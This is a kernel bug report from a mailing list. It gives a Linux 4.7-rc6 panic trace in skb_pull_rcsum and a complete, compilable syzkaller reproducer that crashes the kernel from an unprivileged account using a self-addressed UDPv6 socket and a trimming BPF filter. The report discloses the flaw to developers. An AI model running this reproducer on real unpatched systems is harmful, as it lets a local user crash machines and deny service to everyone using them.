BUG_ON crash in linux 4.7-rc6/master skbuff.c
From: Marco Grassi <marco.gra () gmail com>
Date: Tue, 5 Jul 2016 18:36:55 +0800
Hi, this program crashes the Linux kernel 4.7-rc6 and current master with a deliberate panic() reached through a BUG_ON in net/core/skbuff.c:3051:

kernel BUG at net/core/skbuff.c:3051!

Reproduced in a qemu environment with KASAN enabled, in a syzkaller-style setup.

---- crash trace ----
[ 59.831394] kernel BUG at net/core/skbuff.c:3051!
[ 59.831802] invalid opcode: 0000 [#1] SMP KASAN
[ 59.832193] Modules linked in:
[ 59.832488] CPU: 0 PID: 1651 Comm: derp2 Not tainted 4.7.0-rc6 #1
[ 59.833022] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 59.833827] task: ffff8800ba26c740 ti: ffff8800b8ba8000 task.ti: ffff8800b8ba8000
[ 59.834498] RIP: 0010:[<ffffffff8292611c>] [<ffffffff8292611c>] skb_pull_rcsum+0x1ec/0x2c0
[ 59.835238] RSP: 0018:ffff88011b007768 EFLAGS: 00010206
[ 59.835705] RAX: ffff8800ba26c740 RBX: ffff880119c338c0 RCX: ffff880119c33940
[ 59.836311] RDX: 0000000000000100 RSI: 0000000000000008 RDI: ffff880119c33940
[ 59.836916] RBP: ffff88011b007798 R08: ffff88011b007700 R09: 0000000000000001
[ 59.837521] R10: 1ffff10017742929 R11: ffff880119c33982 R12: 0000000000000001
[ 59.838141] R13: 0000000000000008 R14: ffff880119c33998 R15: ffff8800b88ce490
[ 59.838767] FS: 0000000002454880(0000) GS:ffff88011b000000(0000) knlGS:0000000000000000
[ 59.839522] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 59.840017] CR2: 0000000020013000 CR3: 00000000b9940000 CR4: 00000000000006f0
[ 59.840631] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 59.841242] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 59.841851] Stack:
[ 59.842033] ffff88011b007798 ffff880119c338c0 ffff8800b93d3980 0000000000000000
[ 59.842759] 0000000000000000 ffffffff83a8a200 ffff88011b0077f0 ffffffff82c54dba
[ 59.843430] ffff880100000000 0000000000000000 00000001ab123950 ffffffff83a8a200
[ 59.844102] Call Trace:
[ 59.844317] <IRQ>
[ 59.844495] [<ffffffff82c54dba>] udpv6_queue_rcv_skb+0x4fa/0x15b0
[ 59.845048]
[<ffffffff82c56b36>] __udp6_lib_rcv+0xcc6/0x1d20
[ 59.845540] [<ffffffff82c57bb1>] udpv6_rcv+0x21/0x30
[ 59.845975] [<ffffffff82bf5971>] ip6_input_finish+0x3a1/0x1170
[ 59.846510] [<ffffffff82bf7faa>] ip6_input+0xda/0x1f0
[ 59.846950] [<ffffffff82bf7ed0>] ? ipv6_rcv+0x1790/0x1790
[ 59.847418] [<ffffffff8296ce36>] ? __netif_receive_skb+0x36/0x170
[ 59.847944] [<ffffffff8296d024>] ? netif_receive_skb_internal+0xb4/0x210
[ 59.848520] [<ffffffff82bf53ae>] ip6_rcv_finish+0x11e/0x340
[ 59.849002] [<ffffffff82bf74f0>] ipv6_rcv+0xdb0/0x1790
[ 59.849450] [<ffffffff82bf6740>] ? ip6_input_finish+0x1170/0x1170
[ 59.849978] [<ffffffff811fc519>] ? __enqueue_entity+0x139/0x230
[ 59.850517] [<ffffffff81206100>] ? update_curr+0x150/0x4e0
[ 59.850993] [<ffffffff82bf6740>] ? ip6_input_finish+0x1170/0x1170
[ 59.851520] [<ffffffff8296be64>] __netif_receive_skb_core+0x1754/0x26f0
[ 59.852101] [<ffffffff8296a710>] ? netdev_info+0x120/0x120
[ 59.852603] [<ffffffff8120717b>] ? check_preempt_wakeup+0x50b/0xa70
[ 59.853167] [<ffffffff811e6cd4>] ? check_preempt_curr+0x204/0x350
[ 59.853715] [<ffffffff8296ce2f>] __netif_receive_skb+0x2f/0x170
[ 59.854286] [<ffffffff82971037>] process_backlog+0x197/0x580
[ 59.854789] [<ffffffff8296ea99>] net_rx_action+0x7c9/0xcf0
[ 59.855264] [<ffffffff8296e2d0>] ? sk_busy_loop+0xa00/0xa00
[ 59.855760] [<ffffffff822a8c90>] ? __e1000_maybe_stop_tx+0x200/0x200
[ 59.856333] [<ffffffff82d394d3>] ? __do_softirq+0x403/0x585
[ 59.856829] [<ffffffff82d3929e>] __do_softirq+0x1ce/0x585
[ 59.857298] [<ffffffff82d3800c>] do_softirq_own_stack+0x1c/0x30
[ 59.857808] <EOI>
[ 59.857983] [<ffffffff81172568>] do_softirq.part.19+0x38/0x40
[ 59.858535] [<ffffffff811725ed>] __local_bh_enable_ip+0x7d/0x80
[ 59.859048] [<ffffffff82be694d>] ip6_finish_output2+0x7dd/0x1510
[ 59.859568] [<ffffffff81c3f920>] ? __do_once_done+0x1a0/0x210
[ 59.860066] [<ffffffff82be6170>] ? dst_output+0x80/0x80
[ 59.860520] [<ffffffff8294d670>] ?
skb_flow_dissector_init+0x290/0x290
[ 59.861082] [<ffffffff81c31c40>] ? copy_page_from_iter+0xa20/0xa20
[ 59.861616] [<ffffffff815c85a1>] ? memset+0x31/0x40
[ 59.862042] [<ffffffff82bf29f2>] ip6_finish_output+0x302/0x560
[ 59.862578] [<ffffffff82bf4259>] ? __ip6_make_skb+0x1279/0x1bc0
[ 59.863127] [<ffffffff82bf2da3>] ip6_output+0x153/0x390
[ 59.863582] [<ffffffff82bf2c50>] ? ip6_finish_output+0x560/0x560
[ 59.864100] [<ffffffff82bf2fe0>] ? ip6_output+0x390/0x390
[ 59.864573] [<ffffffff82cc3d57>] ip6_local_out+0x87/0xb0
[ 59.865036] [<ffffffff82bf4c2e>] ip6_send_skb+0x8e/0x1b0
[ 59.865522] [<ffffffff82c4decd>] udp_v6_send_skb+0x60d/0x1120
[ 59.866021] [<ffffffff82c4ec08>] udp_v6_push_pending_frames+0x228/0x340
[ 59.866643] [<ffffffff82c4e9e0>] ? udp_v6_send_skb+0x1120/0x1120
[ 59.867164] [<ffffffff82a50d50>] ? ip_reply_glue_bits+0xb0/0xb0
[ 59.867677] [<ffffffff82c5069e>] udpv6_sendmsg+0x189e/0x22e0
[ 59.868168] [<ffffffff82a50d50>] ? ip_reply_glue_bits+0xb0/0xb0
[ 59.868693] [<ffffffff82c4ee00>] ? udp_v6_flush_pending_frames+0xe0/0xe0
[ 59.869285] [<ffffffff813b3ee2>] ? is_ftrace_trampoline+0xc2/0xf0
[ 59.869814] [<ffffffff8109010a>] ? print_context_stack+0x6a/0xf0
[ 59.870351] [<ffffffff814ce4b0>] ? warn_alloc_failed+0x240/0x240
[ 59.870883] [<ffffffff815c2de4>] ? deactivate_slab+0x134/0x3d0
[ 59.871387] [<ffffffff815c1f93>] ? alloc_debug_processing+0x73/0x1b0
[ 59.871936] [<ffffffff82b387bc>] inet_sendmsg+0x24c/0x350
[ 59.872405] [<ffffffff82b38570>] ? inet_recvmsg+0x3d0/0x3d0
[ 59.872913] [<ffffffff829081ff>] sock_sendmsg+0xcf/0x110
[ 59.873389] [<ffffffff82908462>] sock_write_iter+0x222/0x3c0
[ 59.873879] [<ffffffff82908240>] ? sock_sendmsg+0x110/0x110
[ 59.874394] [<ffffffff82c94c07>] ? ip6_datagram_release_cb+0x1e7/0x260
[ 59.874969] [<ffffffff81c2a6cf>] ? iov_iter_init+0xaf/0x1d0
[ 59.875453] [<ffffffff8161d71b>] __vfs_write+0x3cb/0x640
[ 59.875915] [<ffffffff8161d350>] ? default_llseek+0x2c0/0x2c0
[ 59.876412] [<ffffffff81ac3fd7>] ?
apparmor_file_permission+0x27/0x30
[ 59.876969] [<ffffffff8162106a>] ? rw_verify_area+0xea/0x2b0
[ 59.877460] [<ffffffff816216b5>] vfs_write+0x175/0x4a0
[ 59.877907] [<ffffffff81624f18>] SyS_write+0xd8/0x1b0
[ 59.878364] [<ffffffff81624e40>] ? SyS_read+0x1b0/0x1b0
[ 59.878831] [<ffffffff811271c9>] ? trace_do_page_fault+0x79/0x240
[ 59.879362] [<ffffffff82d36476>] entry_SYSCALL_64_fastpath+0x1e/0xa8
[ 59.879907] Code: fc ff df 48 89 fa 48 c1 ea 03 0f b6 04 02 84 c0 74 08 3c 03 0f 8e ba 00 00 00 80 a3 91 00 00 00 f9 e9 4a ff ff ff e8 b4 fe a4 fe <0f> 0b e8 ad fe a4 fe 0f 0b e8 a6 fe a4 fe 31 d2 4c 89 ff 44 89
[ 59.882261] RIP [<ffffffff8292611c>] skb_pull_rcsum+0x1ec/0x2c0
[ 59.882798] RSP <ffff88011b007768>
[ 59.883143] ---[ end trace d7d3f86c27f0e339 ]---
[ 59.883546] Kernel panic - not syncing: Fatal exception in interrupt
[ 59.884589] Kernel Offset: disabled
[ 59.884906] ---[ end Kernel panic - not syncing: Fatal exception in interrupt
--- reproducer ---
derp2.c
----
gcc derp2.c -o derp2
/*
 * syzkaller-generated reproducer. The SYS_* fallbacks below are the x86_64
 * syscall numbers, so this file is x86_64-only as written. <pthread.h> is
 * included but nothing in the file uses it.
 */
#include <unistd.h>
#include <sys/syscall.h>
#include <string.h>
#include <stdint.h>
#include <pthread.h>
#ifndef SYS_mmap
#define SYS_mmap 9
#endif
#ifndef SYS_socket
#define SYS_socket 41
#endif
#ifndef SYS_bind
#define SYS_bind 49
#endif
#ifndef SYS_sendto
#define SYS_sendto 44
#endif
#ifndef SYS_setsockopt
#define SYS_setsockopt 54
#endif
#ifndef SYS_dup
#define SYS_dup 32
#endif
#ifndef SYS_write
#define SYS_write 1
#endif
/* Result slot per syscall; none of them is checked, as is usual for this
 * kind of generated program. */
long r[22];
/*
 * Trigger sequence, as far as the code and the trace above show: a UDPv6
 * socket bound to ::1 corks a datagram addressed to itself, attaches a
 * classic-BPF socket filter that returns 1 (accept, but keep only 1 byte),
 * then flushes the corked datagram. The packet loops back to the same
 * socket, the filter trims it below the size of a UDP header, and
 * udpv6_queue_rcv_skb -> skb_pull_rcsum hits the BUG_ON (RSI=8 and R12=1 in
 * the register dump are consistent with "pull 8 bytes from a 1-byte skb",
 * though that reading is inferred). Every call here is available to an
 * unprivileged local user, so this is a local denial of service. As I
 * recall it, the upstream fix makes the UDP receive path drop a packet that
 * a filter has shortened below the UDP header instead of BUG_ON-ing; verify
 * against the tree before relying on that.
 */
int main() {
    memset(r, -1, sizeof(r));
    /* Fixed scratch mapping at 0x20000000, length 0x1e000, prot 0x3 =
     * PROT_READ|PROT_WRITE, flags 0x32 = MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS.
     * Every pointer passed to a syscall below lies inside this range. */
    r[0] = syscall(SYS_mmap, 0x20000000ul, 0x1e000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);
    /* socket(AF_INET6 = 10, SOCK_DGRAM = 2, 0): the UDPv6 socket. */
    r[1] = syscall(SYS_socket, 0xaul, 0x2ul, 0x0ul, 0, 0, 0);
    /* 128-byte sockaddr buffer: family 0x000a (AF_INET6), port bytes ab 12,
     * flowinfo, address ::1, scope id, zero padding. */
    memcpy((void*)0x20006000, "\x0a\x00\xab\x12\xc7\x17\x1c\x83\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x05\x4f\xdc\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 128);
    /* bind(sock, &addr, 0x80): the socket listens on ::1 at that port. */
    r[3] = syscall(SYS_bind, r[1], 0x20006000ul, 0x80ul, 0, 0, 0);
    /* 166 bytes of arbitrary datagram payload. */
    memcpy((void*)0x20017f5a, "\x25\xf9\x1b\xd4\xeb\xf5\x39\x3c\xd5\x80\xf6\xf0\xd6\xe1\xff\x65\x30\x97\xac\xaf\x1b\xbc\xc8\xae\xa4\x1e\xab\xd8\x60\x51\xcb\x4b\xed\xae\xaa\x37\xda\x80\xf9\x06\xb8\x6b\xdf\xcc\x78\x0f\xd0\x87\xf2\x65\x5f\x5e\x85\xb5\x4d\x6b\x48\xff\xf3\x0d\x46\x1c\xe5\xa4\x48\x38\x78\x18\x71\x9b\x75\xc4\xc9\x77\xf2\xc4\x5f\x88\x8e\xd2\x8d\x97\x26\x56\x4c\x93\x31\xbc\x64\x22\xff\xdc\x68\x01\x74\x43\xea\x84\x6f\x1d\x90\xeb\x98\x6c\xe9\x1c\x3b\x72\xab\xa0\xb5\x5b\xe8\xee\xfb\xf3\x2d\x96\xa0\xd4\x13\x55\xbc\xd4\xe0\x41\xfd\x78\x7e\x90\xf9\x9f\x9c\x57\x32\x47\xf2\xcf\x7f\x4a\x7b\x79\x0a\xdd\xb4\xce\xbd\x0b\x44\x02\x95\x0f\xaf\x50\xff\x87\x90\x09\xaa\x94\x01\x41\x43\x08\x8e\xb1", 166);
    /* 28-byte destination sockaddr_in6: same family and port bytes as the
     * bound address, address ::1 -- the socket sends to itself. */
    memcpy((void*)0x200001a2, "\x0a\x00\xab\x12\x0d\xf5\xba\x69\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xac\xad\xce\xa0", 28);
    /* sendto(sock, payload, 166, flags, &dst, 28). The flag word is fuzzer
     * noise, but its low 16 bits (0x9d8c) include 0x8000 = MSG_MORE, so the
     * datagram is corked rather than sent; that matches the trace, where
     * udp_v6_push_pending_frames appears only under SyS_write. */
    r[6] = syscall(SYS_sendto, r[1], 0x20017f5aul, 0xa6ul, 0x249e4e54fe149d8cul, 0x200001a2ul, 0x1cul);
    /* struct sock_fprog at 0x2001dff0 (x86_64 layout: u16 len at +0,
     * pointer at +8, 16 bytes total): len = 1, filter = 0x2001d000. */
    *(uint16_t*)0x2001dff0 = (uint16_t)0x1;
    *(uint64_t*)0x2001dff8 = (uint64_t)0x2001d000;
    /* The single struct sock_filter { u16 code; u8 jt; u8 jf; u32 k; }:
     * code 0x06 = BPF_RET|BPF_K, k = 1, i.e. "accept and keep 1 byte".
     * (uint8_t)0x4e6 silently truncates to 0xe6; jt/jf are unused by a
     * BPF_RET, so the truncation is harmless generator noise. */
    *(uint16_t*)0x2001d000 = (uint16_t)0x6;
    *(uint8_t*)0x2001d002 = (uint8_t)0x4e6;
    *(uint8_t*)0x2001d003 = (uint8_t)0x0;
    *(uint32_t*)0x2001d004 = (uint32_t)0x1;
    /* setsockopt(sock, SOL_SOCKET = 1, SO_ATTACH_FILTER = 26, &fprog, 16).
     * Attaching a socket filter needs no privilege. */
    r[13] = syscall(SYS_setsockopt, r[1], 0x1ul, 0x1aul, 0x2001dff0ul, 0x10ul, 0);
    /* dup(sock); the final write goes through the duplicate descriptor. */
    r[14] = syscall(SYS_dup, r[1], 0, 0, 0, 0, 0);
    /* 40 (0x28) more payload bytes at 0x20013000. */
    *(uint32_t*)0x20013000 = (uint32_t)0x28;
    *(uint32_t*)0x20013004 = (uint32_t)0x2;
    *(uint64_t*)0x20013008 = (uint64_t)0x0;
    *(uint64_t*)0x20013010 = (uint64_t)0xfffffffffffffff7;
    *(uint64_t*)0x20013018 = (uint64_t)0x7;
    *(uint16_t*)0x20013020 = (uint16_t)0x1;
    /* write(dup, buf, 0x28) carries no MSG_MORE, so the corked datagram is
     * appended to and flushed (trace: SyS_write -> udpv6_sendmsg ->
     * udp_v6_push_pending_frames). The loopback delivery then runs the
     * filter in softirq context and reaches the BUG_ON. */
    r[21] = syscall(SYS_write, r[14], 0x20013000ul, 0x28ul, 0, 0, 0);
    return 0;
}
----
thank you
Marco
https://marcograss.github.io